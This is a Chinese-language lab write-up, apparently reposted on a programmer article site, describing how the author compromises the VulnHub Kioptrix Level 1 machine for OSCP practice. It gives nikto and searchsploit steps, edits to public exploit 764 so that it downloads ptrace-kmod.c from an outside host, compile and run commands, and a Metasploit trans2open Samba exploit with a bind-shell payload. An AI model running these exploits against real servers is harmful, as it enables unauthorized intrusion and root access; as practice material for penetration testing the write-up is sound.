欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

oscp——Kioptrix: Level 1 (#1)

程序员文章站 2024-03-22 08:37:16
...

0x00 前言

这个是第十七台机子了,网上说这个机子是非常简单的,所以来试验一下

链接

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

0x01 信息收集

1.IP

oscp——Kioptrix: Level 1 (#1)

2.端口

oscp——Kioptrix: Level 1 (#1)

0x02 攻击

1.端口

这里可以看到80端口开放了OpenSSL
使用nikto进行扫描(我记得oscp考试貌似不让使用工具)

nikto -host 192.168.25.188
oscp——Kioptrix: Level 1 (#1)
找到了一个rce,然后search一下
oscp——Kioptrix: Level 1 (#1)
这里我们选用764,然后 -m 进行下载,编译出现了问题
oscp——Kioptrix: Level 1 (#1)
使用命令apt-get install libssl1.0-dev进行安装
oscp——Kioptrix: Level 1 (#1)
按照网上的讲解,来进行修改
首先添加两个头
oscp——Kioptrix: Level 1 (#1)
然后找到#define COMMAND2的位置进行修改wget的内容,因为wget的网站已经挂了
https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c;
oscp——Kioptrix: Level 1 (#1)
然后再961行的地方将unsigned char *p, *end;修改为const unsigned char *p, *end;

最后:
gcc 764.c -o att -lcrypto,运行之后即可选择0x6b
oscp——Kioptrix: Level 1 (#1)
运行./att 0x6b 192.168.25.188 -c 40
oscp——Kioptrix: Level 1 (#1)
还开放了139端口,是samba的端口,之前做过类似的。
enum4linux进行一个扫描,但是我这边的扫描的结果没有显示版本

看了网上说是2.28的洞,这里简单的记录一下

use exploit/linux/samba/trans2open
set PAYLOAD linux/x86/shell_bind_tcp
set rhost 192.168.25.188
run

oscp——Kioptrix: Level 1 (#1)

0x03 总结

感觉稍微难一点的机子作的多了,这种直接用漏洞提权的反而不习惯了。

  • Apache OpenSSL的洞
  • Saber的洞
相关标签: oscp